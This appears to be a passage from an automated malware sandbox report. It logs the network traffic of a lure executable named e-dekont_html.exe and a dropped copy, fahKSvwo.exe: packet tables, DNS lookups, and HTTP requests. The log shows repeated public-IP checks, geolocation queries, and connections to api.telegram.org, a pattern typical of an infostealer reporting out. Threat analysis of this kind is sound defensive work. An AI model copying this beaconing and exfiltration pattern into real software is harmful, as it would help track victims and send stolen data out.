                                                                                                                                                        Nov 20, 2024 07:52:23.788772106 CET8049762193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.788832903 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.788970947 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.789465904 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.789511919 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.793796062 CET8049762193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.874299049 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.884010077 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.884030104 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:24.029120922 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:24.029186964 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:24.029314041 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:24.035851002 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:24.069381952 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:24.071445942 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:24.074882030 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:24.074959040 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:24.076466084 CET8049763193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:24.076560974 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:24.076741934 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:24.083189964 CET8049763193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.552380085 CET8049762193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.558695078 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.558743000 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.559009075 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.561306953 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.561319113 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.603216887 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:25.731915951 CET8049763193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.733099937 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.733150959 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.733383894 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.733659983 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:25.733675003 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.774918079 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.016578913 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.027354956 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.027396917 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.148950100 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.149024010 CET44349765188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.149152040 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.149681091 CET49765443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.154051065 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.154871941 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.159153938 CET8049762193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.159212112 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.159702063 CET8061281193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.159778118 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.159900904 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.164675951 CET8061281193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.208085060 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.218035936 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.218076944 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.360060930 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.360141993 CET44361280188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.360197067 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.360714912 CET61280443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.377496004 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.382683992 CET8049763193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.382733107 CET4976380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:26.386410952 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:26.386442900 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.386502981 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:26.386971951 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:26.386981964 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.906852961 CET8061281193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.939892054 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.939930916 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.940021992 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.940779924 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:26.940793991 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.962404013 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.007286072 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.007400990 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:27.057197094 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:27.057235956 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.057574034 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.059108019 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:27.099323988 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.285608053 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.285705090 CET44361282149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.285782099 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:27.327327013 CET61282443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:27.429968119 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.446254969 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:27.446309090 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.582225084 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.582312107 CET44361283188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.582443953 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:27.582930088 CET61283443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:27.586882114 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.588591099 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.592119932 CET8061281193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.592705965 CET6128180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.593545914 CET8061284193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:27.593651056 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.593836069 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:27.598674059 CET8061284193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.172739983 CET8061284193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.174340963 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.174391031 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.174487114 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.174792051 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.174808025 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.228024960 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.628767967 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.631058931 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.631083965 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.774925947 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.774995089 CET44361285188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.775134087 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.775760889 CET61285443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:29.780258894 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.781481028 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.786473036 CET8061286193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.786556959 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.786611080 CET8061284193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:29.786780119 CET6128480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.786780119 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:29.791691065 CET8061286193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:30.439938068 CET8061286193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:30.441859961 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:30.441915989 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:30.442086935 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:30.442451000 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:30.442467928 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:30.493685961 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:30.929121971 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:30.931087017 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:30.931107044 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.077049971 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.077121019 CET44361287188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.077210903 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:31.077785015 CET61287443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:31.082248926 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:31.082889080 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:31.087631941 CET8061286193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.087696075 CET6128680192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:31.087738991 CET8061288193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.087804079 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:31.087949038 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:31.092755079 CET8061288193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.563946009 CET8061288193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.565932989 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:31.565992117 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.566203117 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:31.566581964 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:31.566602945 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:31.618767023 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:32.029791117 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.031636953 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:32.031680107 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.180910110 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.180991888 CET44361289188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.181152105 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:32.181806087 CET61289443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:32.191895962 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:32.192878008 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.192959070 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.193064928 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.193679094 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.193696976 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.197304964 CET8061288193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.197372913 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:32.810045958 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.810307026 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.811769009 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.811814070 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.812747955 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.814323902 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.859349012 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060009003 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060094118 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060167074 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:33.062693119 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:43.379934072 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:49.243485928 CET4974980192.168.2.4193.122.130.0

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Nov 20, 2024 07:52:10.302706003 CET5448353192.168.2.41.1.1.1
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET53544831.1.1.1192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:12.672609091 CET5467853192.168.2.41.1.1.1
                                                                                                                                                        Nov 20, 2024 07:52:12.679936886 CET53546781.1.1.1192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.010752916 CET5834053192.168.2.41.1.1.1
                                                                                                                                                        Nov 20, 2024 07:52:20.018009901 CET53583401.1.1.1192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:25.644753933 CET53647811.1.1.1192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:26.378350019 CET5374353192.168.2.41.1.1.1
                                                                                                                                                        Nov 20, 2024 07:52:26.385658026 CET53537431.1.1.1192.168.2.4

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Nov 20, 2024 07:52:10.302706003 CET192.168.2.41.1.1.10x7acfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:12.672609091 CET192.168.2.41.1.1.10xedccStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:20.010752916 CET192.168.2.41.1.1.10x891cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:26.378350019 CET192.168.2.41.1.1.10x2fd0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:10.310097933 CET1.1.1.1192.168.2.40x7acfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:12.679936886 CET1.1.1.1192.168.2.40xedccNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:12.679936886 CET1.1.1.1192.168.2.40xedccNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:20.018009901 CET1.1.1.1192.168.2.40x891cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:20.018009901 CET1.1.1.1192.168.2.40x891cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                        Nov 20, 2024 07:52:26.385658026 CET1.1.1.1192.168.2.40x2fd0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                        • api.telegram.org
                                                                                                                                                        • checkip.dyndns.org

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449733193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:10.325648069 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:11.369198084 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:11 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 0692645c0508c1d76532682d1acb3868
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                        Nov 20, 2024 07:52:11.440049887 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:12.561940908 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:12 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 5b45d6737af18f3c783c76c1630a2a24
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                        Nov 20, 2024 07:52:13.499758959 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:13.604727030 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:13 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: b934ffd403c3b37b184f814fc685a74e
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449738193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:14.239823103 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:14.940684080 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:14 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 243d95896239242d7a05bd886335cd7d
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449740193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:15.524806023 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:16.666760921 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:16 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 8d9a8402a6199b15b29d325b3f5ac96e
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449741193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:16.604588032 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
